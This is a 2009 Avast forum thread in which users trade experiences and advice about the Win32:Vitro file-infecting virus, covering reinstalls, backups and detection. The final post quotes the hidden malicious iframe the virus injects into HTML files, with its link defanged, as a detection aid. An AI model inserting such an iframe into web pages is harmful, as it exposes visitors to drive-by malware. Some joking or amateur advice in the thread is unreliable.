Author Topic: Malware name Win32:Vitro  (Read 341292 times)

0 Members and 1 Guest are viewing this topic.

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Malware name Win32:Vitro
« Reply #195 on: April 10, 2009, 01:52:58 AM »
This virus is horible from what I understand and needs to get a REMOVAL TOOL so if it does try to infect a PC, the REMOVAL TOOL can stop it.
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline Confused Computer User

  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 700
  • The answer is 42
Re: Malware name Win32:Vitro
« Reply #196 on: April 10, 2009, 02:34:02 AM »
Not much sense in doing that. This thing (because it's soo much more than a virus now) infects executable files.

A REMOVAL TOOL  wouldn't stand a chance. At least I think so. The only options are prevention (first and foremost) and format.  :(
Computer Systems:

Intel Pentium 4 641 / 2GB RAM / Vista Home Basic SP2 / avast! 5.0 Home / SAS Free / MBAM Free / Windows Defender / Windows Firewall / Spyware Blaster/ Secunia PSI / Firefox 3.6 / Opera 10.5

Core2Duo T8300 / 4GB RAM / Vista Home Premium SP2 (32 bit version) / Same Software.

cballar2

  • Guest
Re: Malware name Win32:Vitro
« Reply #197 on: April 10, 2009, 02:45:45 AM »
Hey all-

I recently contracted this virus on my home desktop computer, and was wondering if other hardware such as iPods that are connected to the computer by USB are able to contract and share the virus to other computers.  Just a precaution before i try to plug my iPod back into my laptop.  Thanks.

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Malware name Win32:Vitro
« Reply #198 on: April 10, 2009, 03:14:56 AM »
Not much sense in doing that. This thing (because it's soo much more than a virus now) infects executable files.

A REMOVAL TOOL  wouldn't stand a chance. At least I think so. The only options are prevention (first and foremost) and format.  :(

Woulden't it be possible if the REMOVAL TOOL added its own extintion with a whole different coding like ".ffs" or ".wgr" so it wouldn't infect it?
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline Confused Computer User

  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 700
  • The answer is 42
Re: Malware name Win32:Vitro
« Reply #199 on: April 10, 2009, 03:59:38 AM »
 ???

Woulden't it be possible if the REMOVAL TOOL added its own extintion with a whole different coding like ".ffs" or ".wgr" so it wouldn't infect it?

Up until now I've never seen those types of files. I looked for a description and only found one for ".ffs" at:

http://en.wikipedia.org/wiki/Unix_File_System

The thing is that we can't safe these files in formats that windows doesn't recognize and then try to execute them. It would be like trying to run a ".exe" file on MAC OS X. It wont happen unless you use special applications. (see link)
http://www.pcuser.com.au/pcuser/hs2.nsf/lookup+1/83ADDE11BB01E5A1CA256C48000F4708

So even if the file is a non executable it would have to be opened by one that is so still not much choice since that would probably be opened.

I could be wrong... I'm not sure if the ".wgr" type of files run on windows.
Computer Systems:

Intel Pentium 4 641 / 2GB RAM / Vista Home Basic SP2 / avast! 5.0 Home / SAS Free / MBAM Free / Windows Defender / Windows Firewall / Spyware Blaster/ Secunia PSI / Firefox 3.6 / Opera 10.5

Core2Duo T8300 / 4GB RAM / Vista Home Premium SP2 (32 bit version) / Same Software.

optikal_illuzion

  • Guest
Re: Malware name Win32:Vitro
« Reply #200 on: April 10, 2009, 05:39:05 AM »
This Vitro virus makes me sooooooooooooooo glad I'm still running WindowsME on my computer.
My wife on the other hand..... Not so happy. Her system has been killed by this virus 5 times in the last week. And mine hasn't been effected or infected at all. She has Avast on her computer and the thing will detect the Win32 Vitro file on every system32 she has. Been through file recoveries, and formats and the pesky things still comes back.

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Malware name Win32:Vitro
« Reply #201 on: April 10, 2009, 06:20:08 AM »
???

Woulden't it be possible if the REMOVAL TOOL added its own extintion with a whole different coding like ".ffs" or ".wgr" so it wouldn't infect it?

Up until now I've never seen those types of files. I looked for a description and only found one for ".ffs" at:

http://en.wikipedia.org/wiki/Unix_File_System

The thing is that we can't safe these files in formats that windows doesn't recognize and then try to execute them. It would be like trying to run a ".exe" file on MAC OS X. It wont happen unless you use special applications. (see link)
http://www.pcuser.com.au/pcuser/hs2.nsf/lookup+1/83ADDE11BB01E5A1CA256C48000F4708

So even if the file is a non executable it would have to be opened by one that is so still not much choice since that would probably be opened.

I could be wrong... I'm not sure if the ".wgr" type of files run on windows.

Maybe the program could add the extintions so it works like with Microsoft Small Busness. O_o
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

shaybear

  • Guest
Re: Malware name Win32:Vitro
« Reply #202 on: April 10, 2009, 06:29:07 AM »
all of you are kidding right ?
fighting it ?
if you see vitro and you have external Hard Drive
Bash external Hard Drive with a hammer then burn it in microwave
insert your OS disk (make sure its read-only like CD-DVD)
format your hard drives
install OS
go buy a new external Hard Drive

LMFAO!!!!  OK, I had to quote this and thank you for posting it.  In a matter of 10 seconds i went from wanting to put my fist thru my Pc, to laughing and starting with a clear and focused mind... LOL Bash with a hammer then burn it in a microwave hahaha  ok, now back to going Xena on this damn viruses ass.... 

shaybear

  • Guest
Re: Malware name Win32:Vitro
« Reply #203 on: April 10, 2009, 06:55:00 AM »
ok in my system 32 folder ( I am running XP service pack 3 ) there is the winlogon.exe file, but also in my C:Windows/Temp folder there is an exe file named winlognn ( thats winlogNn - 2 "n" s) could that temp folder file be the issue??? it was created yesterday ( 4/9/2009) .   we reformatted this POS on 4/6/2009 and with it being in the TEMP folder, Im thinking thats the virus....  ( sorry I am not a very computer-savvy girl lol

Offline Confused Computer User

  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 700
  • The answer is 42
Re: Malware name Win32:Vitro
« Reply #204 on: April 10, 2009, 02:42:23 PM »

Maybe the program could add the extintions so it works like with Microsoft Small Busness. O_o


I have no clue what that is. Sorry.
Computer Systems:

Intel Pentium 4 641 / 2GB RAM / Vista Home Basic SP2 / avast! 5.0 Home / SAS Free / MBAM Free / Windows Defender / Windows Firewall / Spyware Blaster/ Secunia PSI / Firefox 3.6 / Opera 10.5

Core2Duo T8300 / 4GB RAM / Vista Home Premium SP2 (32 bit version) / Same Software.

MAXIUM

  • Guest
Re: Malware name Win32:Vitro
« Reply #205 on: April 10, 2009, 09:42:49 PM »

ADAMSNAKE

  • Guest
Re: Malware name Win32:Vitro
« Reply #206 on: April 10, 2009, 10:48:08 PM »
Hi guys i been reading this topic over the past few days looking for ways to remove this virus without formating but no luck. so insted i did format and i did get the virus again using old back ups lmao.

I removed my old backups but did manage to keep some ISO files which are same (no virus alert from avast).

With my old backups i had txt documents that had the virus in. .exe had them in.

A JPEG picture did not have it in.

I am wondering about MP3, when my pc got infected i had another HDD 400gig full of music and flims. i did turn off the pc and disconnect that drive when messing around. I managed to get rid of the virus i think. But i am unsure about my 400gig, i have run a few .avi and opened a few .txt files and no virus alert. before i go to be i will run a scan.

What file types are effected by this virus? and whar are not.

I read that only xp is effected by this virus? strange hey.

Last question i have a friend that has important movies and stuff on his pc, he has been affected with this virus but he has no way of backing up his stuff. is there any way on how to remove it without formating and losing everything?. If he does a virus scan and removes the virus it will eat away his system files so thats out of the question.

any help

Thank you so much.

Adam Evans.

BTW two virus programs that i know pick this up, AVG FREE and AVAST! HOME FREE.

cheers guys

boybawang

  • Guest
Re: Malware name Win32:Vitro
« Reply #207 on: April 11, 2009, 02:14:00 AM »
Last question i have a friend that has important movies and stuff on his pc, he has been affected with this virus but he has no way of backing up his stuff. is there any way on how to remove it without formating and losing everything?
1. Make a thorough bootscan with AVAST first before doing a backup. And allow it to delete all infected files. Don't worry your movies won't be deleted.

2. After it's done with the cleaning, your system will continue booting. DONT ALLOW IT TO CONTINUE BOOTING!! Turn-off your system immediately before it completes the boot-up process because Vitro still exists.

3.If you wanna backup in a clean environment without any worries about vitro infecting in the background, You download LINUX UBUNTU. Burn it, boot it, and do all the backup from there. It has a simple burning utility that should be enough for your purpose. But don't backup HTML/HTM files and EXE files especially exe files below 100KB in size because most Virus passes AVAST detection.  that's all.


Off topic: I just found the funniest Vitro removal guide in the following link!
skip immediately to the Vitro manual removal instruction part for the best humor ;D ;D ;D ;D
http://www.spywareremove.com/removeWin32Vitro.html

DonNils

  • Guest
Re: Malware name Win32:Vitro
« Reply #208 on: April 12, 2009, 06:12:23 AM »
Quote
how did you know that it your HTML files are not infected? by scanning with AVAST?
You should know that so far AVAST can't detect an infected HTML file!  You better try to open the file with notepad and you will see the malicious link in iFrame attached at the bottom.
The same applies to EXE files. Not all infected EXE files can be detected by avast so the size is our only hint.

yes lol i checked them all (and notepad ++ has a nice function to search in all files in a given directory for text... Strg+F)
nothing like iframe was detected.. neither i opened it with a webbrowser; just viewed it!

boybawang

  • Guest
Re: Malware name Win32:Vitro
« Reply #209 on: April 12, 2009, 08:47:49 AM »
Hi DonNils,

It's something that looks like this at the bottom of HTM page:
<iframe src="hxxp://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>

Misak changed http -> hxxp (live malware link)
« Last Edit: April 12, 2009, 01:55:51 PM by misak »